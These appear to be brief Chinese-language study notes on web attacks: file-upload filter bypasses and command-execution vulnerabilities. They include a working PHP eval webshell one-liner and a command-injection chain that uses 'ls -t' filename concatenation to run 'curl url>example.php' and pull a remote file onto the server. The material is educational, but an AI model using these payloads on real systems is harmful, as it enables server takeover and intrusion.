一 文件上传
1.未做任何过滤
直接上传php文件即可()
<?php @eval($_POST['shell']);
2.前端绕过(前端javascript验证绕过)
burp抓包修改后缀名
3.幻数限制(文件头限制)
在php文件前加判定的头名称
4.黑名单限制(win系统下)
可通过win系统下自动将文件后缀名中的.
和空格进行删除,来绕过。
二 代码命令执行漏洞
1.命令执行漏洞
调用system函数,可以执行Ubuntu中的命令(eg:ls/whoami)

2.案例(执行:curl url>eample.php)——此案例需将环境搭建在Ubuntu系统中

可以用名称拼接的方式
ls -t(以时间传输的方式排列当前文件夹下的文件)
ls -t>a(将文件名拼接成一个命令,放入a文件中)
sh a(执行a命令)
(之后可以查看我们从执行的curl url>emample.php命令后example.php文件)
网友评论